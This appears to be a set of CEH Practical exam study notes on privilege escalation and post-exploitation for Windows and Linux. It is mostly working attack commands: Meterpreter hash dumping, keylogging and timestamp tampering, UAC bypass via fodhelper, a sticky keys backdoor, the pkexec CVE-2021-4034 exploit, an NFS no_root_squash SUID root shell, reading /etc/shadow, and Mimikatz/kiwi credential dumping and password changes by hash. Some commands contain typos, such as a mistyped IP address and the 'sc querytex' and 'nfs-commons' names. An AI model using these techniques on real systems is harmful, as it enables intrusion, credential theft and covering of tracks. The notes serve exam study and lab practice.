2. Privilege Escalation
Privilege Escalation techniques to learn for CEH Practical
1. Escalate privileges using Priv Esc tools
After you have a meterpreter session, use the following command to check the user.
getuid
We can use BeRoot tool to check for further attack vectors.
uploading with meterpreter. Files go to downloads folder by default
upload beroot.exe
Now run shell and then execute the file. It will list the attack vectors.

Note: Windows privileges can be used to escalated privileges. These privileges include SeDebug, SeRestore & SeBackup & SeTakeOwnership, SeTcb & SeCreateToken, SeLoadDriver, and Selmpersonate & SeAssignPrimaryToken. BeRoot lists all available privileges and highlights if you have one of these tokens.
Ghostpack Seatbelt
Gather information with following commands
Seatbelt.exe -group=all -full
Seatbelt.exe -group=system
Seatbelt.exe -group=user
Seatbelt.exe -group=misc
Dumping hashes in meterpreter
hashdump // or try the following
use post/windows/gather/smart_hashdump
2. Post exploitation using Meterpreter
Useful commands
sysinfo
getuid
ifconfig
pwd \\(mostly downloads folder)
ls
cat
cd
keyscan_start //keylogger
keyscan-dump
idletime
To modify the timestamp MACE (modified, accessed,created,entry) attributes
timestomp secret.ext -m "2/11/2022 8:10:03"
To view timestamp entries
timestomp secret.ext -v
Finding files in meterpreter
search -f flag*.txt (in meterpreter)
Hidden files in shell
First get the shell, then use the following command.
dir /a:h
List all running services in shell
sc querytex type=service state=all
Other shell commands
netsh firewall show state \\firewall state
netsh firewall show config
wmic cpu get
wmic /node:"" product get name,version,vendor
wmic useraccount get name,sid
wmic os where Primary='TRUE' reboot //restarts system

3. Linux privilige esc with pkexec
CVE (2021-4034)
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
Download and run the script
4. Linux priv esc with NFS misconfiguration
Configure NFS in Victim
sudo apt install nfs-kernel-server
open /etc/exports file. This file contains the list of shares you want to share in the network. Add the following entry.
/home *(rw,no_root_squash)
restart the server
sudo /etc/init.d/nfs-kernel-server restart
If we run the nmap scan now, port 2049 will appear as open.

In Attacking Machine
Now install NFS commons
sudo apt install nfs-commons
check the mouted folder
showmount -e 192.168.18.110
Now mount the share
mkdir /tmp/nfs
sudo mount -t nfs 19.168.18.110:/home /tmp/nfs
Now move to the directory
cd /tmp/nfs
cp /bin/bash .
chmod +s bash //allows the group to execute it
ls -la bash
to check free space
sudo df -h

Now ssh into the machine. Move to the shared directory and run bash and we will get the root shell.
cd /home
./bash -p
useful commands post exploitation
id
whoami
cat etc/cronjobs
find / -name *.txt -ls 2>/dev/null to list all text files in system
route -n host/network names in binary format
Now copy nano to current directory and then read shadow file
sudo cp /bin/nano .
./nano -p /etc/shadow
To see running processes
ps -ef
To view executable binaries
find / -perm -4000 *.txt -ls 2>/dev/null
5. Escalate privliges bypassing UAC and sticky keys
After you have a meterpreter session background it and then use the following exploit
use exploit/windows/local/bypassuac_fodhelper
Then once you get a new meterpreter session, use the following command
getsystem -t 1
To view the current sessions, you can use the following command.
sessions -i*
Using sticky keys to priv esc on Win 11
After the initial meterpreter session, use the following module.
use post/windows/manage/sticky_keys
Now set the already priv escalated session in options and exploit it.
Now on Windows 11 , sign in with a normal user and once you press the stick keys(shift 5 times), you will get cmd as admin.
6. Priv esc using Mimikatz
Metasploit has built in module for mimikatz call kiwi.
First get a meterpreter session. Escalate privilege using bypassuac.
In meterpreter load the module
load kiwi
help kiwi \\to see help

to dump hashes
lsa_dump_sam
We can also dump LSA Secrets using the following command. LSA secrets are used to manage local system security policy. it may contain passwords, IE passwords, SQL passwords etc
change the password with kiwi with hash without knowing the original password.
password_change -u raj -p 123 -P 9876
password_change -u raj -n <NTLM-hash> -P 1234
Last updated
Was this helpful?